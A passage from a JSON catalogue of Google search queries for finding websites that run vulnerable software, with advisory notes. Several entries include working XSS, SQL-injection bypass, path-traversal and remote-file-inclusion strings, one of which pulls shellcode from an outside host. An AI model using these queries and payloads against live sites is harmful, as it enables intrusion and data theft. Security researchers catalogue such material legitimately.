"\"TinyBB 2011 all rights reserved\"", "description": "Submitter: Aodrulez SQL Injection: https://www.exploit-db.com/exploits/15961/"}, {"dork": "\"Powered by: PHP Link Directory\"", "description": "CSRF Vuln: https://www.exploit-db.com/exploits/16037/"}, {"dork": "Photo Gallery powered by TinyWebGallery 1.8.3", "description": "Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: https://www.exploit-db.com/exploits/16090"}, {"dork": "site:ebay.com inurl:callback", "description": "Returns:\nhttp://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?\nthen:\nhttp://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E\nCan also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters"}, {"dork": "http://www.google.com/#sclient=psy&hl=en&safe=off&site=&source=hp&q=:inurl%3Amj_wwwusr&aq=f&aqi=&aql=&oq=&pbx=1&fp=2dcb6979649afcb0", "description": "https://www.exploit-db.com/exploits/16103/"}, {"dork": "allintext: /qcodo/_devtools/codegen.php", "description": "Information Disclosure: https://www.exploit-db.com/exploits/16116"}, {"dork": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "description": "SQL Injection: https://www.exploit-db.com/exploits/16122"}, {"dork": "\"powered by zipbox media\"", "description": "Author:XaDaL http://site.com/album.php?id=[SQLi]"}, {"dork": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "description": "Author : AtT4CKxT3rR0r1ST \nSQL Injection: www.site.com/album.php?id=null[Sql]"}, {"dork": "intext:\"Powered by EZPub\"", "description": "SQL Injection: https://www.exploit-db.com/exploits/16941"}, {"dork": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "description": "vtiger CRM version 5.x presence\n--\nLiquidWorm"}, {"dork": "inurl:\"mod.php?mod=blog\" intext:\"powered by DIY-CMS\"", "description": "DIY-CMS blog mod SQL Injection. Author: snup"}, {"dork": "inurl:\"/showPlayer.php?id=\" intext:\"powered by ellistonSPORT\"", "description": "ellistonSPORT Remote SQL Injection Vulnerability. Author: ITTIHACK"}, {"dork": "inurl:wp-content/plugins/age-verification/age-verification.php", "description": "Wordpress Age Verification Plugin \nhttps://www.exploit-db.com/exploits/18350"}, {"dork": "inurl:\"tiki-index.php\" filetype:php \"This is TikiWiki 1.9\"", "description": "The server vulnerable to => CVE 2006-4602"}, {"dork": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "description": "Servers with vulnerability who exploit in this link:\nhttps://www.exploit-db.com/exploits/13850/\nDork by Rootkit Pentester."}, {"dork": "intext:\"Powered By OpenCart\" -site:opencart.com -inurl:\"Powered By OpenCart\" -intitle:\"OpenCart\" -intitle:\"powered by\"", "description": "Find Open Carts for Remote File Upload vulnerability.\nDecoy"}, {"dork": "inurl:\".php?cat=\" inurl:\"'\"", "description": "Finds sites vulnerable to SQL Injection!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/load.cgi\" ext:cgi", "description": "Finds more pages vulnerable to redirection\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"Access Denied\" \"Powered by Incapsula\" ext:php", "description": "Finds vulnerable pages that triggered Incapsula WAF\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "intitle:index of AND (intext:mirai.x86 OR intext:mirai.mips OR intext:mirai.mpsl OR intext:mirai.arm OR intext:mirai.arm7 OR intext:mirai.ppc OR intext:mirai.spc OR intext:mirai.m68k OR intext:mirai.sh4)", "description": "Description: Find servers infected with mirai\r\n\r\nAuthor: SadFud"}, {"dork": "allinurl:\"/wp-content/plugins/wp-noexternallinks\"", "description": "Dork to find the \"No External Links\" plugin vulnerable to XSS\r\n\r\n\"\"Error: Plugin does not support standalone calls, damned hacker.\"\"\r\n\r\n\r\n\r\n\r\n\r\nallinurl:\"/wp-content/plugins/wp-noexternallinks\"\r\n\r\n\r\n\r\nDrok3r"}, {"dork": "inurl:\"exit.php?url=\" -entry_id", "description": "Pages vulnerable to arbitrary redirection\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"pubdlcnt.php?file=\" ext:php", "description": "Finds EVEN MORE redirection vulnerabilities... Go crazy.\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "intitle:\"Index of /\" \"mod_ssl 2.2.22 OpenSSL/1.0.1\"", "description": "Finds OpenSSL servers that are vulnerable to the Heartbleed Bug\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "filetype:ini \"wordfence\"", "description": "Google Dork: filetype:ini \"wordfence\"\r\n\r\n\r\n\r\nDescription: finds WordPress websites that are running the Wordfence WAF,\r\n\r\nand by proxy, reveals the full site directory path.\r\n\r\n\r\n\r\nAuthor: echobb8"}, {"dork": "inurl:\"/wp-admin/setup-config.php\" intitle:\"Setup Configuration File\"", "description": "Finds Wordpress unfinished installations.\r\n\r\nLike published at defcon:\r\n\r\nhttps://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf\r\n\r\n\r\n\r\nDork:\r\n\r\ninurl:\"/wp-admin/setup-config.php\" intitle:\"Setup Configuration File\"\r\n\r\n\r\n\r\nB0x41S\r\n\r\nX-ray IT"}, {"dork": "filetype:php \"Git Deployment Script v0.1\"", "description": "Query : filetype:php \"Git Deployment Script v0.1\"\nVulnerable php git deployment script : https://gist.github.com/oodavid/1809044\n- Discloses all files not contained in the git repository\n- Most users do not secure their .git folder so you can clone their repo\nFor a result [exemple.com/path/deploy.php](http://exemple.com/deploy.php)\n- wget -r -np exemple.com/path/.git/\n- cd ./exemple.com/path/.git/\n- git reset --hard\n- You have a copy of the website content\n- Cringe\nNate"}, {"dork": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "description": "myBloggie is affected by multiple vulnerabilities. http://www.securityfocus.com/bid/13507"}, {"dork": "inurl:inc_photogallerymanager.asp", "description": "DMXReady Photo Gallery Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7783"}, {"dork": "inurl:\"tr.php?id=\" Short Url & Url Tracker", "description": "YourFreeWorld Short Url & Url Tracker (id) SQL Injection Vuln - CVE: 2008-4885: https://www.exploit-db.com/exploits/6940"}, {"dork": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "description": "Woltlab Burning Board 1.0.2, 2.3.6 search.php SQL Injection - CVE: 2007-0388: https://www.exploit-db.com/exploits/3143"}, {"dork": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "description": "Nucleus CMS 3.22 (DIR_LIBS) Arbitrary Remote Inclusion - CVE: 2006-2583: https://www.exploit-db.com/exploits/1816"}, {"dork": "\"propuls\u00e9 par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "description": "DotClear 1.2.4 (prepend.php) Arbitrary Remote Inclusion - CVE: 2006-2866: https://www.exploit-db.com/exploits/1869"}, {"dork": "\"powered by php photo album\" -demo2 -pitanje\"", "description": "PHP Album 0.3.2.3 Remote Command Execution: https://www.exploit-db.com/exploits/1678"}, {"dork": "\"Powered by kryCMS\"", "description": "kryCMS Version 3.0 SQL Injection. Author: tempe_mendoan"}, {"dork": "inurl:custva.asp", "description": "The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others."}, {"dork": "\"Powered by mnoGoSearch - free web search engine software\"", "description": "According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server."}, {"dork": "intitle:guestbook \"advanced guestbook 2.2 powered\"", "description": "Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit \"Admin\" then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209"}, {"dork": "filetype:asp inurl:\"shopdisplayproducts.asp\"", "description": "VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.According to http://www.securityfocus.com/bid/9164/discussion/ a vulnerability has been reported to exist in VP-ASP software that may allow a remote user to launch cross-site scripting attacks. A remote attacker may exploit this issue to potentially execute HTML or script code in the security context of the vulnerable site.The vendor has released fixes to address this issue. It is reported that the fixes are applied to VP-ASP 5.0 as of February 2004. An attacker could also search Google for intitle:\"VP-ASP Shopping Cart *\" -\"5.0\" to find unpatched servers."}, {"dork": "\"Powered by: vBulletin * 3.0.1\" inurl:newreply.php", "description": "vBulletin is a customizable forums package for web sites. It has been written in PHP and is complimented with MySQL. While a user is previewing the post, both newreply.php and newthread.php correctly sanitize the input in 'Preview', but not Edit-panel. Malicious code can be injected by an attacker through this flaw. More information at http://www.securityfocus.com/bid/10612/."}, {"dork": "\"Powered by Invision Power Board(U) v1.3 Final\"", "description": "Invision Power Board is reported prone to an SQL injection vulnerability in its ssi.php script. Due to improper filtering of user supplied data, ssi.php is exploitable by attackers to pass SQL statements to the underlying database. The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition. Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.More info: http://www.securityfocus.com/bid/10511/info/"}, {"dork": "\"powered by sphider\" -exploit -ihackstuff -www.cs.ioc.ee", "description": "dork: \"powered by sphider\" a vulnerable search engine script arbitrary remote inclusion, poc: http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com where on somehost.com you have a shellcode in /conf.php/index.html references:http://retrogod.altervista.org/sphider_13_xpl_pl.htmlhttp://secunia.com/advisories/19642/"}, {"dork": "inurl:gotoURL.asp?url=", "description": "ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement."}, {"dork": "\"powered by antiboard\"", "description": "\"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page.\"There is an excellent vulnerability report at:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendor Status:The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future."}, {"dork": "inurl:comersus_message.asp", "description": "About Comercus: \"Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers.\"Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/ This search finds the XSS vulnerable file comersus_message.asp?message= ..No version info is included with the search. Not all results are vulnerable."}, {"dork": "ext:pl inurl:cgi intitle:\"FormMail *\" -\"*Referrer\" -\"* Denied\" -sourceforge -error -cvs -input", "description": "FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/"}, {"dork": "inurl:\"dispatch.php?atknodetype\" | inurl:class.at", "description": "Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html"}, {"dork": "\"Powered by Gallery v1.4.4\"", "description": "http://www.securityfocus.com/bid/10968/discussion/\"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. \""}, {"dork": "\"Powered by Ikonboard 3.1.1\"", "description": "IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2."}, {"dork": "inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca", "description": "WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCredits goes to PhTeam for discovering this vulnerability."}, {"dork": "inurl:\"/becommunity/community/index.php?pageurl=\"", "description": "E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta"}, {"dork": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "description": "DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/"}, {"dork": "\"Powered by DCP-Portal v5.5\"", "description": "DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc"}, {"dork": "\"FC Bigfeet\" -inurl:mail", "description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append \"typo3\" to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities."}, {"dork": "filetype:cgi inurl:tseekdir.cgi", "description": "The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html"}, {"dork": "filetype:cgi inurl:pdesk.cgi", "description": "PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html"}, {"dork": "\"Powered by IceWarp Software\" inurl:mail", "description": "IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:\"Powered by IceWarp Software\" inurl:mailintitle:\"IceWarp Web Mail\" inurl:\":32000/mail/\"http://www.securityfocus.com/bid/10920"}, {"dork": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "description": "The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option \"root:x:0:1:super-user:/\" on line 2 or above."}, {"dork": "inurl:com_remository", "description": "It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&Itemid= Renegade added : \".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box..."}, {"dork": "inurl:\"comment.php?serendipity\"", "description": "serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/"}, {"dork": "\"Powered by AJ-Fork v.167\"", "description": "AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to be backwards-compatible with CuteNews in what areas are sensible. It is vulnerable for a full path disclosure. http://www.securityfocus.com/bid/11301"}, {"dork": "\"Powered by Megabook *\" inurl:guestbook.cgi", "description": "MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065"}, {"dork": "\"Powered by yappa-ng\"", "description": "yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.http://www.securityfocus.com/bid/11314"}, {"dork": "\"Active Webcam Page\" inurl:8080", "description": "Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting"}, {"dork": "\"Powered by A-CART\"", "description": "A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login-password). http://www.securityfocus.com/bid/5597 (search SF for more)"}, {"dork": "\"Online Store - Powered by ProductCart\"", "description": "ProductCart is \"an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites\". Multiple SQL injection vulnerabilities have been found in the product, they allow anything from gaining administrative privileges (bypassing the authentication mechanism), to executing arbitrary code. http://www.securityfocus.com/bid/8105 (search SF for more)"}, {"dork": "\"Powered by FUDforum\"", "description": "FUDforum is a forums package. It uses a combination of PHP & MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems. http://www.securityfocus.com/bid/5501"}, {"dork": "\"BosDates Calendar System \" \"powered by BosDates v3.2 by BosDev\"", "description": "\"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users.\" There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection."}, {"dork": "intitle:\"EMUMAIL - Login\" \"Powered by EMU Webmail\"", "description": "The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems: * EMU Webmail version 5.0 * EMU Webmail version 5.1.0 Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. http://www.securityfocus.com/bid/9861"}, {"dork": "intitle:\"WebJeff - FileManager\" intext:\"login\" intext:Pass|PAsse", "description": "WebJeff-Filemanager 1.x DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files. The problem is that the \"index.php3\" file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995"}, {"dork": "inurl:\"messageboard/Forum.asp?\"", "description": "Multiple vulnerabilities have been found in GoSmart Message Board. A remote user can conduct SQL injection attack and Cross site scripting attack. http://www.securityfocus.com/bid/11361"}, {"dork": "\"1999-2004 FuseTalk Inc\" -site:fusetalk.com", "description": "Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript."}, {"dork": "\"2003 DUware All Rights Reserved\"", "description": "Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. DUclassmate may allow unauthorized remote attackers to gain access to a computer. DUclassified is reported prone to multiple SQL injection vulnerabilities. SQL injection issues also affect DUforum. DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities."}, {"dork": "\"This page has been automatically generated by Plesk Server Administrator\"", "description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP. Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code. This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username. http://www.securityfocus.com/bid/3737"}, {"dork": "inurl:ttt-webmaster.php", "description": "Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.Vulnerability report: http://www.securityfocus.com/bid/11358Vendor site: http://www.turbotraffictrader.com/php"}, {"dork": "\"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2002 Agustin Dondo Scripts\"", "description": "CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617"}, {"dork": "\"Powered by CubeCart\"", "description": "--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction\"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.\"This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:\"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172\"(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt"}, {"dork": "\"Ideal BB Version: 0.1\" -idealbb.com", "description": "Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. Securityfocus currently has 3 reports idealBB."}, {"dork": "\"Powered by YaPig V0.92b\"", "description": "YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452"}, {"dork": "inurl:\"/site/articles.asp?idcategory=\"", "description": "Dwc_Articles is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Nearly all scripts suffer from possible sql injections. http://www.securityfocus.com/bid/11509"}, {"dork": "filetype:cgi inurl:nbmember.cgi", "description": "vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504"}, {"dork": "\"Powered by Coppermine Photo Gallery\"", "description": "published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the moment.http://www.securityfocus.com/bid/11485"}, {"dork": "\"Powered by WowBB\" -site:wowbb.com", "description": "WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/"}, {"dork": "\"Powered by ocPortal\" -demo -ocportal.com", "description": "Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368"}, {"dork": "inurl:\"slxweb.dll\"", "description": "salesLogix is the Customer Relationship Management solution thatdrives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the server into authenticating a remote user as the CRM administrator without requiring a password. It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450"}, {"dork": "\"Powered by DMXReady Site Chassis Manager\" -site:dmxready.com", "description": "It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation."}, {"dork": "\"Powered by My Blog\" intext:\"FuzzyMonkey.org\"", "description": "FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325"}, {"dork": "inurl:wiki/MediaWiki", "description": "MediaWiki is reported prone to a cross-site scripting vulnerability. This issue arises due to insufficient sanitization of user-supplied data. A remote attacker may exploit this vulnerability to execute arbitrary HTML and script code in the browser of a vulnerable user.bugtraq id 11480objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 18, 2004updated Oct 20, 2004vulnerable MediaWiki MediaWiki 1.3MediaWiki MediaWiki 1.3.1MediaWiki MediaWiki 1.3.2MediaWiki MediaWiki 1.3.3MediaWiki MediaWiki 1.3.4MediaWiki MediaWiki 1.3.5MediaWiki MediaWiki 1.3.6not vulnerable MediaWiki MediaWiki 1.3.7"}, {"dork": "\"inurl:/site/articles.asp?idcategory=\"", "description": "Dwc_Articles, is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through 